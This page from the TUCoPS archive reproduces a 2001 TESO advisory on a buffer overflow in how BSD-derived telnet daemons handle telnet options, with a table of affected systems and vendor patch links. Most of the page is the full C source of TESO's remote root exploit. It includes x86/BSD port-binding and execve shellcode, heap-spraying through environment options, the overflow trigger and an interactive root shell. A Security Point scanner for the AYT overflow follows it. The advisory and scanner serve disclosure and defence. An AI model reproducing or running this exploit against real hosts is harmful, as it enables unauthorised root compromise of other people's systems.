Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Unix :: General :: telnet1.htm

Telnetd buffer overflows



COMMAND

    telnetd

SYSTEMS AFFECTED

    Multiple vendor Telnet Daemon

PROBLEM

    scut found  following (TESO  Security Advisory).   Within most  of
    the  current  telnet  daemons  in  use  today there exist a buffer
    overflow  in   the  telnet   option  handling.    Under    certain
    circumstances  it  may  be  possible  to  exploit  it to gain root
    priviledges remotely.

    Systems affected:

        System                                  | vulnerable   | exploitable *
        ----------------------------------------+--------------+------------------
		AIX                                     |      yes     |
        BSDI 4.x default                        |      yes     |       yes
        FreeBSD [2345].x default                |      yes     |       yes
        IRIX 6.5                                |      yes     |        no
        Linux netkit-telnetd < 0.14             |      yes     |        ?
        Linux netkit-telnetd >= 0.14            |       no     |
        NetBSD 1.x default                      |      yes     |       yes
        OpenBSD 2.x                             |      yes     |        ?
        OpenBSD current                         |       no     |
        Solaris 2.x sparc                       |      yes     |        ?
        <almost any other vendor's telnetd>     |      yes     |        ?
        ----------------------------------------+--------------+------------------

    * = From  our analysis and  conclusions, which may  not be correct
        or we may have overseen things.  Do not rely on this.

    Through sending  a specially  formed option  string to  the remote
    telnet  daemon  a  remote  attacker  might  be  able  to overwrite
    sensitive  information  on  the  static  memory  pages.   If  done
    properly this  may result  in arbitrary  code getting  executed on
    the remote machine  under the priviledges  the telnet daemon  runs
    on, usually root.

    Within  every  BSD  derived  telnet  daemon  under UNIX the telnet
    options are  processed by  the 'telrcv'  function.   This function
    parses  the  options  according  to  the  telnet  protocol and its
    internal state.  During this  parsing the results which should  be
    send back to  the client are  stored within the  'netobuf' buffer.
    This is  done without  any bounds  checking, since  it is  assumed
    that the  reply data  is smaller  than the  buffer size  (which is
    BUFSIZ bytes, usually).

    However, using a combination of options, especially the 'AYT'  Are
    You There  option, it  is possible  to append  data to the buffer,
    usually nine bytes long.   To trigger this response, two  bytes in
    the input buffer are necessary. Since this input buffer is  BUFSIZ
    bytes  long,  you  can  exceed  the  output  buffer  by as much as
    (BUFSIZ / 2) * 9) - BUFSIZ bytes.  For the common case that BUFSIZ
    is defined to be 1024, this results in a buffer overflow by up  to
    3584 bytes.  On systems where  BUFSIZ is defined to be 4096,  this
    is an even greater value (14336).

    Due to the limited set of characters an attacker is able to  write
    outside of the buffer it is difficult - if not impossible on  some
    systems - to exploit this  buffer overflow.  Another hurdle  for a
    possible attacker may  be the lack  of interesting information  to
    modify after the buffer.

    This buffer  overflow should  be considered  serious nevertheless,
    since experience has  shown that even  complicated vulnerabilities
    can be exploited by skilled attackers, BIND TSIG and SSH  deattack
    come to mind.

    TESO have constructed a working  exploit for any version of  BSDI,
    NetBSD  and  FreeBSD.   Exploitation  on  Solaris  sparc  may   be
    possible but  if it  is, it  is very  difficult involving  lots of
    arcane tricks.  OpenBSD is not as easily exploitable as the  other
    BSD's,  because  they  do  compile  with other options by default,
    changing memory layout.

    /* 7350854 - x86/bsd telnetd remote root exploit
     *
     * TESO CONFIDENTIAL - SOURCE MATERIALS
     *
     * This is unpublished proprietary source code of TESO Security.
     *
     * (C) COPYRIGHT TESO Security, 2001
     * All Rights Reserved
     *
     *****************************************************************************
     * bug found by scut 2001/06/09
     * further research by smiler, zip, lorian and me.
     * thanks to zip's cool friend for giving me a testbed to play on
     *
     * tested against: BSDI BSD/OS 4.1
     *                 NetBSD 1.5
     *                 FreeBSD 3.1
     *                 FreeBSD 4.0-REL
     *                 FreeBSD 4.2-REL
     *                 FreeBSD 4.3-BETA
     *                 FreeBSD 4.3-STABLE
     *                 FreeBSD 4.3-RELEASE
     *
     */

    #define VERSION "0.0.7"

    #include <sys/types.h>
    #include <sys/time.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <arpa/inet.h>
    #include <arpa/telnet.h>
    #include <netdb.h>
    #include <errno.h>
    #include <fcntl.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>
    #include <time.h>


    /* global variables, uhhohh!
     */
    int     mode = 16;
    int     num = 245;
    int     pop = 31500;    /* puts code at 0x08fdff0a */
    int     bs = 1;         /* buffer start */

    int     num34 = 244;
    int     pop34 = 71833;  /* puts code at 0x0a0d08fe */
    int     bs34 = 0;

    int     walk;           /* populator walker */
    int     force = 0;      /* force exploitation */
    int     checkonly = 0;  /* check telnetd only */


    void usage (char *progname);
    int xp_check (int fd);
    void xp_pop (int fd);
    void xp_shrinkwin (int fd);
    void xp_setenv (int fd, unsigned char *var, unsigned char *val);
    void xp (int fd);
    void shell (int sock);
    void hexdump (char *desc, unsigned char *data, unsigned int amount);

    /* imported from shellkit */
    unsigned long int random_get (unsigned long int low, unsigned long int high);
    void random_init (void);
    int bad (unsigned char u);
    int badstr (unsigned char *code, int code_len, unsigned char *bad,
            int bad_len);
    unsigned long int x86_nop_rwreg (void);
    unsigned long int x86_nop_xfer (char *xferstr);
    unsigned int x86_nop (unsigned char *dest, unsigned int dest_len,
            unsigned char *bad, int bad_len);

    #define BSET(dest, len, val, bw) { \
            dest &= ~(((unsigned char) ~0) >> bw);  /* clear lower bits */ \
            dest |= val << (8 - bw - len);          /* set value bits */ \
            bw += len; \
    }

    /* imported from network.c */
    #define NET_CONNTIMEOUT 60
    int     net_conntimeout = NET_CONNTIMEOUT;

    unsigned long int net_resolve (char *host);
    int net_connect (struct sockaddr_in *cs, char *server,
            unsigned short int port, int sec);


    /* x86/bsd PIC portshell shellcode
     * by lorian/teso
     * port 0x4444 (might want to change it here)
     */
    unsigned char   x86_bsd_portshell[] =
            "\x31\xdb\xf7\xe3\x53\x43\x53\x43\x53\xb0\x61\x53"
            "\xcd\x80\x96\x52\x66\x68\x44\x44\x66\x53\x89\xe5"
                                    /* ^^  ^^ port */
            "\x6a\x10\x55\x56\x56\x6a\x68\x58\xcd\x80\xb0\x6a"
            "\xcd\x80\x60\xb0\x1e\xcd\x80\x53\x50\x50\xb0\x5a"
            "\xcd\x80\x4b\x79\xf6\x52\x89\xe3\x68\x6e\x2f\x73"
            "\x68\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xb0\x3b\xcd"
            "\x80";

    /* x86/bsd PIC execve shellcode
     * by lorian/teso
     */
    unsigned char   x86_bsd_execvesh[] =
            "\x6a\x3b\x58\x99\x52\x89\xe3\x68\x6e\x2f\x73\x68"
            "\x68\x2f\x2f\x62\x69\x60\x5e\x5e\xcd\x80";

    /* x86/bsd(i)+solaris execve shellcode
     * by lorian/teso
     */
    unsigned char   x86_bsd_compaexec[] =
        "\xbf\xee\xee\xee\x08\xb8\xff\xf8\xff\x3c\xf7\xd0"
        "\xfd\xab\x31\xc0\x99\xb0\x9a\xab\xfc\xab\xb0\x3b"
        "\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89"
        "\xe3\x52\x53\x89\xe1\x52\x51\x53\xff\xd7";


    unsigned char * shellcode = x86_bsd_compaexec;


    #define COL 55


    void
    usage (char *progname)
    {
            fprintf (stderr, "usage: %s [-n <num>] [-c] [-f] <ip>\n\n", progname);
            fprintf (stderr, "-n num\tnumber of populators, for testing purposes\n"
                    "-c\tcheck exploitability only, do not exploit\n"
                    "-f\tforce mode, override check results\n\n");
            fprintf (stderr, "WARNING: this is no easy exploit, we have to get things tightly aligned and\n"
                            "send 16/34mb of traffic to the remote telnet daemon. it might not be able to\n"
                            "take that, or it will take very long for it (> 1h). beware.\n\n");

            fprintf (stderr, "tested:\tFreeBSD 3.1, 4.0-REL, 4.2-REL, 4.3-BETA, 4.3-STABLE, 4.3-RELEASE \n"
                            "\tNetBSD 1.5\n"
                            "\tBSDI BSD/OS 4.1\n\n");

            exit (EXIT_FAILURE);
    }

    int
    main (int argc, char *argv[])
    {
            char                    c;
            char *                  progname;
            char *                  dest;
            int                     i, j, fd,
                                    dots = 0;
            int                     popc;
            struct timeval          start,
                                    cur;
            unsigned long long int  g_pct,  /* gaussian percentage */
                                    g_all;  /* gaussian overall */


            fprintf (stderr, "7350854 - x86/bsd telnetd remote root\n"
                    "by zip, lorian, smiler and scut.\n\n");

            progname = argv[0];
            if (argc < 2)
                    usage (progname);


            while ((c = getopt (argc, argv, "n:cf")) != EOF) {
                    switch (c) {
                    case 'n':
                            num = atoi (optarg);
                            break;
                    case 'c':
                            checkonly = 1;
                            break;
                    case 'f':
                            force = 1;
                            break;
                    default:
                            usage (progname);
                            break;
                    }
            }

            dest = argv[argc - 1];
            if (dest[0] == '-')
                    usage (progname);

            fd = net_connect (NULL, dest, 23, 20);
            if (fd <= 0) {
                    fprintf (stderr, "failed to connect\n");
                    exit (EXIT_FAILURE);
            }

            random_init ();

            if (xp_check (fd) == 0 && force == 0) {
                    printf ("aborting\n");
    #ifndef DEBUG
                    exit (EXIT_FAILURE);
    #endif
            }
            close (fd);

            if (checkonly)
                    exit (EXIT_SUCCESS);

            fd = net_connect (NULL, dest, 23, 20);
            if (fd <= 0) {
                    fprintf (stderr, "failed to connect the second time\n");
                    exit (EXIT_FAILURE);
            }

            printf ("\n#############################################################################\n\n");
            printf ("ok baby, times are rough, we send %dmb traffic to the remote\n"
                    "telnet daemon process, it will spill badly. but then, there is no\n"
                    "other way, sorry...\n\n", mode);

    #ifdef DEBUG
            getchar ();
    #endif
            printf ("## setting populators to populate heap address space\n");

            g_all = ((unsigned long long int)(pop / 2)) *
                            ((unsigned long long int)(pop + 1));
            g_pct = 0;

            printf ("## number of setenvs (dots / network): %d\n", pop);
            printf ("## number of walks (percentage / cpu): %Lu\n", g_all);
            printf ("##\n");
            printf ("## the percentage is more realistic than the dots ;)\n");
            printf ("\n");
            printf ("percent |");

            popc = pop / COL;
            for (i = pop / popc ; i >= 0 ; --i)
                    printf ("-");
            printf ("|      ETA |\n");

            gettimeofday (&start, NULL);

            for (walk = 0 ; walk < pop ; ++walk) {
                    xp_pop (fd);

                    g_pct += walk;

                    if (walk % popc == 0)
                            dots += 1;

                    if (walk % 200 == 0) {
                            int                     pct;
                            float                   pct_f;
                            unsigned long int       diff;

                            pct = (int) ((g_pct * 100) / g_all);
                            pct_f = g_pct * 100;
                            pct_f /= (float) g_all;

                            /* calculate difference not caring about accuracy */
                            gettimeofday (&cur, NULL);
                            diff = cur.tv_sec - start.tv_sec;

                            printf ((pct == 100) ? "\r%3.2f%% |" : ((pct / 10) ?
                                    "\r %2.2f%% |" : "\r  %1.2f%% |"), pct_f);
                            for (j = 0 ; j < dots ; ++j)
                                    printf (".");
                            for ( ; j <= COL ; ++j)
                                    printf (" ");

                            if (pct != 0) {
                                    diff = (int) ((((float)(100 - pct_f)) /
                                            (float) pct_f) * diff);
                                    printf ("| %02lu:%02lu:%02lu |",
                                            diff / 3600, (diff % 3600) / 60,
                                            diff % 60);
                            } else {
                                    printf ("| --:--:-- |");
                            }

                            fflush (stdout);
                    }
            }
            printf ("\n\n");

            printf ("## sleeping for 10 seconds to let the process recover\n");
            sleep (10);

    #ifdef DEBUG
            getchar ();
    #endif
            /* return into 0x08feff0a */
            xp (fd);
            sleep (1);

            printf ("## ok, you should now have a root shell\n");
            printf ("## as always, after hard times, there is a reward...\n");
            printf ("\n\ncommand: ");
            fflush (stdout);

            shell (fd);

            exit (EXIT_SUCCESS);
    }


    void
    xp (int fd)
    {
            int             n;
            unsigned char   buf[2048];


            /* basic overflow */
            for (n = bs ; n < sizeof (buf) ; ++n)
                    buf[n] = (n - bs) % 2 ? '\xf6' : '\xff';

            /* some nifty alignment */
            buf[0] = '\xff';        /* IAC */
            buf[1] = '\xf5';        /* AO  */

            if (mode == 16) {
                    buf[2] = '\xff';        /* IAC */
                    buf[3] = '\xfb';        /* WILL */
                    buf[4] = '\x26';        /* ENCRYPTION */
            }

            /* force 0x08feff0a as return */
            buf[num++] = '\xff';
            buf[num++] = '\xfb';
            buf[num++] = '\x08';

            /* and the output_encrypt overwrite action, yay! */
            buf[num++] = '\xff';
            buf[num++] = '\xf6';

            /* XXX: should not fail here, though we should better loop and check */
            n = send (fd, buf, num, 0);
            if (n != num) {
                    perror ("xp:send");
            }
    }


    #ifdef INSANE_MIND

    void
    xp_shrinkwin (int fd)
    {
            int             n;
            int             iobc;
            int             p = 0;
            unsigned char   buf[2048];
            char            c;
            int             val;
            int             len;

            for (n = 0 ; n < sizeof (buf) ; ++n)
                    buf[n] = n % 2 ? '\xf6' : '\xff';

            len = sizeof (val);
            getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len);
            printf ("SO_SNDLOWAT = %d\n", val);
            val = 1;
            printf ("setsockopt: %s\n",
                    setsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, sizeof(val)) ?
                    "FAILED" : "SUCCESS");
            val = 1234;
            getsockopt (fd, SOL_SOCKET, SO_SNDLOWAT, &val, &len);
            printf ("SO_SNDLOWAT = %d\n", val);

            getchar();
            while (1) {
                    if (p > 105)
                            c = getchar();
                    if (c == 'r') {
                            getchar();
                            read (fd, &buf[1024], 384);
                    } else if (c == 'o') {
                            getchar();
                            send (fd, "7", 1, MSG_OOB);
                    } else if (c != 'r') {
                            usleep(100000);
                            n = send (fd, buf, 112, 0);
                            ioctl (fd, FIONREAD, &iobc);
                            len = sizeof (val);
                            getsockopt (fd, SOL_SOCKET, SO_RCVBUF, &val, &len);
                            printf ("%02d. send: %d  local: %d/%d (%d left)\n",
                                    ++p, n, iobc, val, val - iobc);
                    }
            }
    }
    #endif


    /* xp_pop - populator function
     *
     * causes remote telnet daemon to setenv() variables with our content, populating
     * the heap with shellcode. this will get us more nopspace and place our shellcode
     * where the nice addresses are, that we can create by writing telnet option
     * strings.
     *
     * XXX: there seems to be a maximum size for the environment value you can set,
     *      which is 510. we use 496 bytes for nopspace and shellcode therefore.
     *      should work, rather similar to tsig tcp/malloc exploitation. -sc
     */

    void
    xp_pop (int fd)
    {
            unsigned char   var[16];
            unsigned char   storebuf[496];
            sprintf (var, "%06x", walk);
    #ifdef DEBUG
            memset (storebuf, '\xcc', sizeof (storebuf));
    #else
    /*      memset (storebuf, '\x90', sizeof (storebuf));   */
            x86_nop (storebuf, sizeof (storebuf), "\x00\x01\x02\x03\xff", 5);
            memcpy (storebuf + sizeof (storebuf) - strlen (shellcode) - 1,
                    shellcode, strlen (shellcode));
    #endif
            storebuf[sizeof (storebuf) - 1] = '\0';

            xp_setenv (fd, var, storebuf);
    }


    void
    xp_setenv (int fd, unsigned char *var, unsigned char *val)
    {
            int             n = 0;
            unsigned char   buf[2048];

            buf[n++] = IAC;
            buf[n++] = SB;
            buf[n++] = TELOPT_NEW_ENVIRON;
            buf[n++] = TELQUAL_IS;
            buf[n++] = ENV_USERVAR;

            /* should not contain < 0x04 */
            while (*var) {
                    if (*var == IAC)
                            buf[n++] = *var;
                    buf[n++] = *var++;
            }
            buf[n++] = NEW_ENV_VALUE;
            while (*val) {
                    if (*val == IAC)
                            buf[n++] = *val;
                    buf[n++] = *val++;
            }
            buf[n++] = IAC;
            buf[n++] = SE;

            if (send (fd, buf, n, 0) != n) {
                    perror ("xp_setenv:send");
                    exit (EXIT_FAILURE);
            }
    }


    int
    xp_check (int fd)
    {
            int             n;
            unsigned int    expect_len = 15;
            unsigned char   expected[] =
                    "\x0d\x0a\x5b\x59\x65\x73\x5d\x0d\x0a\xff\xfe\x08\xff\xfd\x26";
                    /* \r  \n  [   Y   e   s   ]   \r  \n IAC DONT 08 IAC DO 26*/
            unsigned int    additional_len = 8;
            unsigned char   additional[] =
                    "\xff\xfa\x26\x01\x01\x02\xff\xf0";
                    /*IAC SB  ENC ........... IAC SE */

            unsigned char   buf[128];

            read (fd, buf, sizeof (buf));

            n = 0;
            buf[n++] = IAC;                 /* 0xff */
            buf[n++] = AYT;                 /* 0xf6 */

            buf[n++] = IAC;                 /* 0xff */
            buf[n++] = WILL;                /* 0xfb */
            buf[n++] = TELOPT_NAOL;         /* 0x08 */

            buf[n++] = IAC;                 /* 0xff */
            buf[n++] = WILL;                /* 0xfb */
            buf[n++] = TELOPT_ENCRYPT;      /* 0x26 */

    #ifdef DEBUG
            hexdump ("check send buffer", buf, n);
    #endif
            if (send (fd, buf, n, 0) != n) {
                    perror ("xp_check:send");
                    exit (EXIT_FAILURE);
            }

            n = read (fd, buf, sizeof (buf));
    #ifdef DEBUG
            hexdump ("check recv buffer", buf, n);
    #endif

            if (memcmp (buf, expected, expect_len) == 0) {
                    if (memcmp (buf+expect_len, additional, additional_len) == 0) {
                            mode = 16;
                    } else {
                            mode = 34;
                            bs = bs34;
                    }
                    printf ("check: PASSED, using %dmb mode\n", mode);

                    return (1);
            }

            printf ("check: FAILED\n");

            return (0);
    }


    void
    shell (int sock)
    {
            int     l;
            char    buf[512];
            fd_set  rfds;


            while (1) {
                    FD_SET (0, &rfds);
                    FD_SET (sock, &rfds);

                    select (sock + 1, &rfds, NULL, NULL, NULL);
                    if (FD_ISSET (0, &rfds)) {
                            l = read (0, buf, sizeof (buf));
                            if (l <= 0) {
                                    perror ("read user");
                                    exit (EXIT_FAILURE);
                            }
                            write (sock, buf, l);
                    }

                    if (FD_ISSET (sock, &rfds)) {
                            l = read (sock, buf, sizeof (buf));
                            if (l <= 0) {
                                    perror ("read remote");
                                    exit (EXIT_FAILURE);
                            }
                            write (1, buf, l);
                    }
            }
    }


    /* ripped from zodiac */
    void
    hexdump (char *desc, unsigned char *data, unsigned int amount)
    {
            unsigned int    dp, p;  /* data pointer */
            const char      trans[] =
                    "................................ !\"#$%&'()*+,-./0123456789"
                    ":;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklm"
                    "nopqrstuvwxyz{|}~...................................."
                    "....................................................."
                    "........................................";


            printf ("/* %s, %u bytes */\n", desc, amount);

            for (dp = 1; dp <= amount; dp++) {
                    fprintf (stderr, "%02x ", data[dp-1]);
                    if ((dp % 8) == 0)
                            fprintf (stderr, " ");
                    if ((dp % 16) == 0) {
                            fprintf (stderr, "| ");
                            p = dp;
                            for (dp -= 16; dp < p; dp++)
                                    fprintf (stderr, "%c", trans[data[dp]]);
                            fflush (stderr);
                            fprintf (stderr, "\n");
                    }
                    fflush (stderr);
            }
            if ((amount % 16) != 0) {
                    p = dp = 16 - (amount % 16);
                    for (dp = p; dp > 0; dp--) {
                            fprintf (stderr, "   ");
                            if (((dp % 8) == 0) && (p != 8))
                                    fprintf (stderr, " ");
                            fflush (stderr);
                    }
                    fprintf (stderr, " | ");
                    for (dp = (amount - (16 - p)); dp < amount; dp++)
                            fprintf (stderr, "%c", trans[data[dp]]);
                    fflush (stderr);
            }
            fprintf (stderr, "\n");

            return;
    }



    unsigned long int
    net_resolve (char *host)
    {
            long            i;
            struct hostent  *he;

            i = inet_addr(host);
            if (i == -1) {
                    he = gethostbyname(host);
                    if (he == NULL) {
                            return (0);
                    } else {
                            return (*(unsigned long *) he->h_addr);
                    }
            }
            return (i);
    }


    int
    net_connect (struct sockaddr_in *cs, char *server,
            unsigned short int port, int sec)
    {
            int                     n,
                                    len,
                                    error,
                                    flags;
            int                     fd;
            struct timeval          tv;
            fd_set                  rset, wset;
            struct sockaddr_in      csa;

            if (cs == NULL)
                    cs = &csa;

            /* first allocate a socket */
            cs->sin_family = AF_INET;
            cs->sin_port = htons (port);
            fd = socket (cs->sin_family, SOCK_STREAM, 0);
            if (fd == -1)
                    return (-1);

            if (!(cs->sin_addr.s_addr = net_resolve (server))) {
                    close (fd);
                    return (-1);
            }

            flags = fcntl (fd, F_GETFL, 0);
            if (flags == -1) {
                    close (fd);
                    return (-1);
            }
            n = fcntl (fd, F_SETFL, flags | O_NONBLOCK);
            if (n == -1) {
                    close (fd);
                    return (-1);
            }

            error = 0;

            n = connect (fd, (struct sockaddr *) cs, sizeof (struct sockaddr_in));
            if (n < 0) {
                    if (errno != EINPROGRESS) {
                            close (fd);
                            return (-1);
                    }
            }
            if (n == 0)
                    goto done;

            FD_ZERO(&rset);
            FD_ZERO(&wset);
            FD_SET(fd, &rset);
            FD_SET(fd, &wset);
            tv.tv_sec = sec;
            tv.tv_usec = 0;

            n = select(fd + 1, &rset, &wset, NULL, &tv);
            if (n == 0) {
                    close(fd);
                    errno = ETIMEDOUT;
                    return (-1);
            }
            if (n == -1)
                    return (-1);

            if (FD_ISSET(fd, &rset) || FD_ISSET(fd, &wset)) {
                    if (FD_ISSET(fd, &rset) && FD_ISSET(fd, &wset)) {
                            len = sizeof(error);
                            if (getsockopt(fd, SOL_SOCKET, SO_ERROR, &error, &len) < 0) {
                                    errno = ETIMEDOUT;
                                    return (-1);
                            }
                            if (error == 0) {
                                    goto done;
                            } else {
                                    errno = error;
                                    return (-1);
                            }
                    }
            } else
                    return (-1);

    done:
            n = fcntl(fd, F_SETFL, flags);
            if (n == -1)
                    return (-1);
            return (fd);
    }


    /* imported from shellkit */

    unsigned long int
    random_get (unsigned long int low, unsigned long int high)
    {
            unsigned long int       val;

            if (low > high) {
                    low ^= high;
                    high ^= low;
                    low ^= high;
            }

            val = (unsigned long int) random ();
            val %= (high - low);
            val += low;

            return (val);
    }


    void
    random_init (void)
    {
            srandom (time (NULL));
    }


    int
    bad (unsigned char u)
    {
            if (u == '\x00' || u == '\x0a' || u == '\x0d' || u == '\x25')
                    return (1);

            return (0);
    }

    int
    badstr (unsigned char *code, int code_len, unsigned char *bad, int bad_len)
    {
            int     n;

            for (code_len -= 1 ; code_len >= 0 ; --code_len) {
                    for (n = 0 ; n < bad_len ; ++n)
                            if (code[code_len] == bad[n])
                                    return (1);
            }

            return (0);
    }

    unsigned long int
    x86_nop_rwreg (void)
    {
            unsigned long int       reg;

            do {
                    reg = random_get (0, 7);
            } while (reg == 4);     /* 4 = $esp */

            return (reg);
    }



    unsigned long int
    x86_nop_xfer (char *xferstr)
    {
            int                     bw = 0; /* bitfield walker */
            unsigned char           tgt;    /* resulting instruction */

            /* in a valid xferstr we trust */
            for (tgt = 0 ; xferstr != NULL && xferstr[0] != '\0' ; ++xferstr) {
                    switch (xferstr[0]) {
                    case ('0'):
                            BSET (tgt, 1, 0, bw);
                            break;
                    case ('1'):
                            BSET (tgt, 1, 1, bw);
                            break;
                    case ('r'):
                            BSET (tgt, 3, x86_nop_rwreg (), bw);
                            break;
                    case ('.'):
                            break;  /* ignore */
                    default:
                            fprintf (stderr, "on steroids, huh?\n");
                            exit (EXIT_FAILURE);
                            break;
                    }
            }

            if (bw != 8) {
                    fprintf (stderr, "invalid bitwalker: bw = %d\n", bw);
                    exit (EXIT_FAILURE);
            }

            return (tgt);
    }


    unsigned int
    x86_nop (unsigned char *dest, unsigned int dest_len,
            unsigned char *bad, int bad_len)
    {
            int     walk;
            int     bcount; /* bad counter */
            char *  xs;
            char *  xferstr[] = {
                    "0011.0111",    /* aaa */
                    "0011.1111",    /* aas */
                    "1001.1000",    /* cbw */
                    "1001.1001",    /* cdq */
                    "1111.1000",    /* clc */
                    "1111.1100",    /* cld */
                    "1111.0101",    /* cmc */
                    "0010.0111",    /* daa */
                    "0010.1111",    /* das */
                    "0100.1r",      /* dec <reg> */
                    "0100.0r",      /* inc <reg> */
                    "1001.1111",    /* lahf */
                    "1001.0000",    /* nop */
                    "1111.1001",    /* stc */
                    "1111.1101",    /* std */
                    "1001.0r",      /* xchg al, <reg> */
                    NULL,
            };
            unsigned char   tgt;


            for (walk = 0 ; dest_len > 0 ; dest_len -= 1 , walk += 1) {
                    /* avoid endless loops on excessive badlisting */
                    for (bcount = 0 ; bcount < 16384 ; ++bcount) {
                            xs = xferstr[random_get (0, 15)];
                            tgt = x86_nop_xfer (xs);

                            dest[walk] = tgt;
                            if (badstr (&dest[walk], 1, bad, bad_len) == 0)
                                    break;
                    }

                    /* should not happen */
                    if (bcount >= 16384) {
                            fprintf (stderr, "too much blacklisting, giving up...\n");
                            exit (EXIT_FAILURE);
                    }
            }

            return (walk);
    }

    Here is the scanner:

    /*
     * Telnetd AYT overflow scanner, by Security Point(R)
     *              Bug found by scut of TESO Security
     *
     * Date: 25/07/01
     * Author: Security Point(R)
     * WWW: http://www.secpoint.com
     * Email: info@secpoint.com
     *
     * This program checks for the AYT overflow realted to the
     * newly discovered telnetd vulnerabilities.
     *
     * Tested agianst:
     *	Vulnerable:
     *		netkit-telnet-0.10
     *              FreeBSD 4.2
     *	Not vulnerable:
     *		netkit-telnet-0.17
     *
     * Please keep us updated whith the os's that you check, and
     * report back to us on info@secpoint.com, weather the system
     * is vulnerable or not. So we can construct a full list
     * of vulnerable systems.
     *
     *
     * This source code is for educational purpose ONLY,
     * Security Point(R) will not be responsible for any damages
     * whatsoever that have a connection with this code. There are
     * no warranties with regard to this information.
     *
     * Are your networks under attack at this moment?
     *
     * With Security Point(R) Scanner you can find and repair the
     * Vulnerabilities before the bad guys get in.
     *
     * Please see http://www.secpoint.com/solutions.php
     *
     */

    #include <stdio.h>
    #include <stdlib.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <string.h>
    #include <signal.h>
    #include <unistd.h>
    #include <sys/socket.h>


    struct in_addr addr;
    struct sockaddr_in address;
    struct hostent *host;
    int sock;

    char sendbuffer[5120*2];
    char buffer[5120*2];
    int i;
    int timeout;

    void handle_alarm(int signum) {
        alarm(0);
        timeout=1;
    }

    int main (int argc, char *argv[]) {
        printf("Telnetd AYT overflow scanner, by Security Point(R)\n");
        if (argc!=2) {
	    printf("Usage: %s <host>\n", argv[0]);
	    exit(EXIT_FAILURE);
        }
        printf("Host: %s\n", argv[1]);
        if ((host=gethostbyname(argv[1])) == NULL) {
	    perror("gethostbyname");
	    exit(0);
	    exit(EXIT_FAILURE);
        }
        if (( sock = socket(AF_INET, SOCK_STREAM,0)) < 0) {
	    perror("socket");
	    exit(EXIT_FAILURE);
        }
        bcopy(host->h_addr, (char *)&address.sin_addr, host->h_length);
        address.sin_family=AF_INET;
        address.sin_port = htons(23);  // telnet
        if (connect(sock, (struct sockaddr*)&address, sizeof(address)) < 0) {
	    perror("connect");
	    exit(EXIT_FAILURE);
        }
        printf("Connected to remote host...\n",argv[1]);
        printf("Sending telnet options... stand by...\n");
        signal(SIGALRM,handle_alarm);

        bzero(sendbuffer,sizeof(sendbuffer));
        for (i=0;i!=(sizeof(sendbuffer)/2);i++) {
	    sprintf(sendbuffer,"%s%c%c",sendbuffer,255,246); // 0xff 0xf6 - IAC AYT
        }
        alarm(60);
        read(sock, buffer, sizeof(buffer));
        alarm(0);

        write(sock, sendbuffer, strlen(sendbuffer));

        bzero(buffer,sizeof(buffer));

        alarm(60);
        if (read(sock, buffer, sizeof(buffer)) <=0) {
	    printf("Telnetd on %s vulnerable\n",argv[1]);
	    exit(EXIT_SUCCESS);
        }
        alarm(0);
        printf("Telnetd on %s not vulnerable\n",argv[1]);
        exit(EXIT_SUCCESS);
    }

SOLUTION

    The vendors have been notified of the problem at the same time  as
    the general  public, vendor  patches for  your telnet  daemon that
    fix the bug will show up soon.

    Sometimes a fix might not be trivial and require a lot of  changes
    to  the  source  code,  due  to  the insecure nature the 'nfrontp'
    pointer is  handled.   The best  long term  solution is to disable
    the  telnet  daemon  at  all,  since  there  are  good  and   free
    replacements.

    All  current  versions  of  BSD/OS  are  vulnerable.   Patches are
    available via our web site at

        http://www.bsdi.com/services/support/patches
        ftp://ftp.bsdi.com/bsdi/support/patches

    All released versions of  FreeBSD are vulnerable to  this problem,
    which was fixed in FreeBSD 4.3-STABLE and FreeBSD 3.5.1-STABLE  on
    July 23, 2001.  An advisory has been released, along with a  patch
    to  correct  the  vulnerability  and  a  binary  upgrade   package
    suitable  for  use  on  FreeBSD  4.3-RELEASE  systems.   For  more
    information, see the advisory at the following location:

        ftp://ftp.freebsd.org/pub/FreeBSD/CERT/advisories/FreeBSD-SA-01:49.telnetd.asc
        http://www.freebsd.org/doc/en_US.ISO8859-1/books/handbook/mirrors-ftp.html

    For IBM AIX the temporary fixes can be downloaded via ftp from:

        ftp://aix.software.ibm.com/aix/efixes/security/telnetd_efix.tar.Z

    For Kerberos the recommended approach is to apply the  appropriate
    patches and to rebuild your  telnetd.  Patches for the  krb5-1.2.2
    release may be found at:

        http://web.mit.edu/kerberos/www/advisories/telnetd_122_patch.txt


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH